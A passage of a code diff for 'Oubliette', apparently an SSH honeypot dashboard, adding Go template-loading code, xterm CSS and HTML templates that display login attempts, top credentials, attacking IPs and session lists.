}
.xterm.enable-mouse-events {
/* When mouse events are enabled (eg. tmux), revert to the standard pointer cursor */
cursor: default;
}
.xterm.xterm-cursor-pointer,
.xterm .xterm-cursor-pointer {
cursor: pointer;
}
.xterm.column-select.focus {
/* Column selection mode */
cursor: crosshair;
}
.xterm .xterm-accessibility,
.xterm .xterm-message {
position: absolute;
left: 0;
top: 0;
bottom: 0;
right: 0;
z-index: 10;
color: transparent;
pointer-events: none;
}
.xterm .live-region {
position: absolute;
left: -9999px;
width: 1px;
height: 1px;
overflow: hidden;
}
.xterm-dim {
/* Dim should not apply to background, so the opacity of the foreground color is applied
* explicitly in the generated class and reset to 1 here */
opacity: 1 !important;
}
.xterm-underline-1 { text-decoration: underline; }
.xterm-underline-2 { text-decoration: double underline; }
.xterm-underline-3 { text-decoration: wavy underline; }
.xterm-underline-4 { text-decoration: dotted underline; }
.xterm-underline-5 { text-decoration: dashed underline; }
.xterm-overline {
text-decoration: overline;
}
.xterm-overline.xterm-underline-1 { text-decoration: overline underline; }
.xterm-overline.xterm-underline-2 { text-decoration: overline double underline; }
.xterm-overline.xterm-underline-3 { text-decoration: overline wavy underline; }
.xterm-overline.xterm-underline-4 { text-decoration: overline dotted underline; }
.xterm-overline.xterm-underline-5 { text-decoration: overline dashed underline; }
.xterm-strikethrough {
text-decoration: line-through;
}
.xterm-screen .xterm-decoration-container .xterm-decoration {
z-index: 6;
position: absolute;
}
.xterm-screen .xterm-decoration-container .xterm-decoration.xterm-decoration-top-layer {
z-index: 7;
}
.xterm-decoration-overview-ruler {
z-index: 8;
position: absolute;
top: 0;
right: 0;
pointer-events: none;
}
.xterm-decoration-top {
z-index: 2;
position: relative;
}

8
internal/web/static/xterm.min.js vendored Normal file

File diff suppressed because one or more lines are too long

102
internal/web/templates.go Normal file
View File

@@ -0,0 +1,102 @@
package web
import (
"embed"
"fmt"
"html/template"
"time"
)
//go:embed templates/*.html templates/fragments/*.html
var templateFS embed.FS
type templateSet struct {
dashboard *template.Template
sessionDetail *template.Template
}
func templateFuncMap() template.FuncMap {
return template.FuncMap{
"formatTime": func(t time.Time) string {
return t.Format("2006-01-02 15:04:05 UTC")
},
"truncateID": func(id string) string {
if len(id) > 8 {
return id[:8]
}
return id
},
"derefTime": func(t *time.Time) time.Time {
if t == nil {
return time.Time{}
}
return *t
},
"derefFloat": func(f *float64) float64 {
if f == nil {
return 0
}
return *f
},
"formatScore": func(f *float64) string {
if f == nil {
return "-"
}
return fmt.Sprintf("%.0f%%", *f*100)
},
"derefString": func(s *string) string {
if s == nil {
return ""
}
return *s
},
"truncateCommand": func(s string) string {
if len(s) > 50 {
return s[:50] + "..."
}
return s
},
"formatBytes": func(b int64) string {
const (
kb = 1024
mb = 1024 * kb
)
switch {
case b >= mb:
return fmt.Sprintf("%.1f MB", float64(b)/float64(mb))
case b >= kb:
return fmt.Sprintf("%.1f KB", float64(b)/float64(kb))
default:
return fmt.Sprintf("%d B", b)
}
},
}
}
func loadTemplates() (*templateSet, error) {
funcMap := templateFuncMap()
dashboard, err := template.New("").Funcs(funcMap).ParseFS(templateFS,
"templates/layout.html",
"templates/dashboard.html",
"templates/fragments/stats.html",
"templates/fragments/active_sessions.html",
"templates/fragments/recent_sessions.html",
)
if err != nil {
return nil, fmt.Errorf("parsing dashboard templates: %w", err)
}
sessionDetail, err := template.New("").Funcs(funcMap).ParseFS(templateFS,
"templates/layout.html",
"templates/session_detail.html",
)
if err != nil {
return nil, fmt.Errorf("parsing session detail templates: %w", err)
}
return &templateSet{
dashboard: dashboard,
sessionDetail: sessionDetail,
}, nil
}

View File

@@ -0,0 +1,166 @@
{{define "content"}}
<section id="stats-section" hx-get="/fragments/stats" hx-trigger="every 30s" hx-swap="innerHTML">
{{template "stats" .Stats}}
</section>
<details>
<summary>Filters</summary>
<form id="filter-form">
<div class="grid">
<label>Since <input type="date" name="since"></label>
<label>Until <input type="date" name="until"></label>
<label>IP <input type="text" name="ip" placeholder="10.0.0.1"></label>
<label>Country <input type="text" name="country" placeholder="CN" maxlength="2"></label>
<label>Username <input type="text" name="username" placeholder="root"></label>
</div>
<div class="grid">
<label><input type="checkbox" name="human_score" value="1"> Human score &gt; 0</label>
<label>Sort by <select name="sort"><option value="connected_at">Recent</option><option value="input_bytes">Input Bytes</option></select></label>
</div>
<button type="submit">Apply</button>
<button type="button" class="secondary" onclick="clearFilters()">Clear</button>
</form>
</details>
<section>
<h3>Attack Trends</h3>
<div class="grid">
<article>
<header>Attempts Over Time</header>
<canvas id="chart-attempts"></canvas>
</article>
<article>
<header>Hourly Pattern (UTC)</header>
<canvas id="chart-hourly"></canvas>
</article>
</div>
</section>
<section>
<h3>Attack Origins</h3>
<article>
<div id="world-map"></div>
</article>
</section>
<div id="dashboard-content">
{{template "dashboard_content" .}}
</div>
<section>
<h3>Active Sessions</h3>
<div id="active-sessions" hx-get="/fragments/active-sessions" hx-trigger="every 10s" hx-swap="innerHTML">
{{template "active_sessions" .ActiveSessions}}
</div>
</section>
<section>
<h3>Recent Sessions</h3>
<table id="recent-sessions-table">
<thead>
<tr>
<th>ID</th>
<th>IP</th>
<th>Country</th>
<th>Username</th>
<th>Type</th>
<th>Score</th>
<th>Input</th>
<th>Connected</th>
<th>Disconnected</th>
</tr>
</thead>
<tbody>
{{template "recent_sessions" .RecentSessions}}
</tbody>
</table>
</section>
{{end}}
{{define "scripts"}}
<script src="/static/chart.min.js"></script>
<script src="/static/dashboard.js"></script>
{{end}}
{{define "dashboard_content"}}
<section>
<h3>Top Credentials & IPs</h3>
<div class="top-grid">
<article>
<header>Top Usernames</header>
<table>
<thead>
<tr><th>Username</th><th>Attempts</th></tr>
</thead>
<tbody>
{{range .TopUsernames}}
<tr><td>{{.Value}}</td><td>{{.Count}}</td></tr>
{{else}}
<tr><td colspan="2">No data</td></tr>
{{end}}
</tbody>
</table>
</article>
<article>
<header>Top Passwords</header>
<table>
<thead>
<tr><th>Password</th><th>Attempts</th></tr>
</thead>
<tbody>
{{range .TopPasswords}}
<tr><td>{{.Value}}</td><td>{{.Count}}</td></tr>
{{else}}
<tr><td colspan="2">No data</td></tr>
{{end}}
</tbody>
</table>
</article>
<article>
<header>Top IPs</header>
<table>
<thead>
<tr><th>IP</th><th>Country</th><th>Attempts</th></tr>
</thead>
<tbody>
{{range .TopIPs}}
<tr><td>{{.Value}}</td><td>{{.Country}}</td><td>{{.Count}}</td></tr>
{{else}}
<tr><td colspan="3">No data</td></tr>
{{end}}
</tbody>
</table>
</article>
<article>
<header>Top Countries</header>
<table>
<thead>
<tr><th>Country</th><th>Attempts</th></tr>
</thead>
<tbody>
{{range .TopCountries}}
<tr><td>{{.Value}}</td><td>{{.Count}}</td></tr>
{{else}}
<tr><td colspan="2">No data</td></tr>
{{end}}
</tbody>
</table>
</article>
<article>
<header>Top Exec Commands</header>
<table>
<thead>
<tr><th>Command</th><th>Count</th></tr>
</thead>
<tbody>
{{range .TopExecCommands}}
<tr><td><code>{{truncateCommand .Value}}</code></td><td>{{.Count}}</td></tr>
{{else}}
<tr><td colspan="2">No data</td></tr>
{{end}}
</tbody>
</table>
</article>
</div>
</section>
{{end}}

View File

@@ -0,0 +1,32 @@
{{define "active_sessions"}}
<table>
<thead>
<tr>
<th>ID</th>
<th>IP</th>
<th>Country</th>
<th>Username</th>
<th>Type</th>
<th>Score</th>
<th>Input</th>
<th>Connected</th>
</tr>
</thead>
<tbody>
{{range .}}
<tr>
<td><a href="/sessions/{{.ID}}"><code>{{truncateID .ID}}</code></a>{{if gt .EventCount 0}} <mark>replay</mark>{{end}}</td>
<td>{{.IP}}</td>
<td>{{.Country}}</td>
<td>{{.Username}}</td>
<td>{{if .ExecCommand}}<mark>exec</mark>{{else}}{{.ShellName}}{{end}}</td>
<td>{{if .HumanScore}}{{if gt (derefFloat .HumanScore) 0.6}}<mark>{{formatScore .HumanScore}}</mark>{{else}}{{formatScore .HumanScore}}{{end}}{{else}}-{{end}}</td>
<td>{{formatBytes .InputBytes}}</td>
<td>{{formatTime .ConnectedAt}}</td>
</tr>
{{else}}
<tr><td colspan="8">No active sessions</td></tr>
{{end}}
</tbody>
</table>
{{end}}

View File

@@ -0,0 +1,17 @@
{{define "recent_sessions"}}
{{range .}}
<tr>
<td><a href="/sessions/{{.ID}}"><code>{{truncateID .ID}}</code></a>{{if gt .EventCount 0}} <mark>replay</mark>{{end}}</td>
<td>{{.IP}}</td>
<td>{{.Country}}</td>
<td>{{.Username}}</td>
<td>{{if .ExecCommand}}<mark>exec</mark>{{else}}{{.ShellName}}{{end}}</td>
<td>{{if .HumanScore}}{{if gt (derefFloat .HumanScore) 0.6}}<mark>{{formatScore .HumanScore}}</mark>{{else}}{{formatScore .HumanScore}}{{end}}{{else}}-{{end}}</td>
<td>{{formatBytes .InputBytes}}</td>
<td>{{formatTime .ConnectedAt}}</td>
<td>{{if .DisconnectedAt}}{{formatTime (derefTime .DisconnectedAt)}}{{else}}<mark>active</mark>{{end}}</td>
</tr>
{{else}}
<tr><td colspan="9">No sessions</td></tr>
{{end}}
{{end}}

View File

@@ -0,0 +1,20 @@
{{define "stats"}}
<div class="stats-grid">
<article class="stat-card">
<h2>{{.TotalAttempts}}</h2>
<p>Total Attempts</p>
</article>
<article class="stat-card">
<h2>{{.UniqueIPs}}</h2>
<p>Unique IPs</p>
</article>
<article class="stat-card">
<h2>{{.TotalSessions}}</h2>
<p>Total Sessions</p>
</article>
<article class="stat-card">
<h2>{{.ActiveSessions}}</h2>
<p>Active Sessions</p>
</article>
</div>
{{end}}

View File

@@ -0,0 +1,64 @@
<!DOCTYPE html>
<html lang="en" data-theme="dark">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Oubliette</title>
<link rel="stylesheet" href="/static/pico.min.css">
<script src="/static/htmx.min.js"></script>
<style>
:root {
--pico-font-size: 16px;
}
.stats-grid {
display: grid;
grid-template-columns: repeat(auto-fit, minmax(180px, 1fr));
gap: 1rem;
}
.stat-card {
text-align: center;
padding: 1rem;
}
.stat-card h2 {
margin-bottom: 0.25rem;
font-size: 2rem;
}
.stat-card p {
margin: 0;
color: var(--pico-muted-color);
}
.top-grid {
display: grid;
grid-template-columns: repeat(auto-fit, minmax(380px, 1fr));
gap: 1rem;
}
.top-grid article {
overflow: hidden;
min-width: 0;
}
#world-map svg { width: 100%; height: auto; }
#world-map svg path { fill: #2a2a3e; stroke: #555; stroke-width: 0.5; transition: fill 0.2s; }
#world-map svg path:hover, #world-map svg g:hover path { stroke: #fff; stroke-width: 1; }
nav h1 {
margin: 0;
}
nav small {
color: var(--pico-muted-color);
}
</style>
</head>
<body>
<nav class="container">
<ul>
<li><h1>Oubliette</h1></li>
</ul>
<ul>
<li><small>SSH Honeypot Dashboard</small></li>
</ul>
</nav>
<main class="container">
{{block "content" .}}{{end}}
</main>
{{block "scripts" .}}{{end}}
</body>
</html>

Some files were not shown because too many files have changed in this diff Show More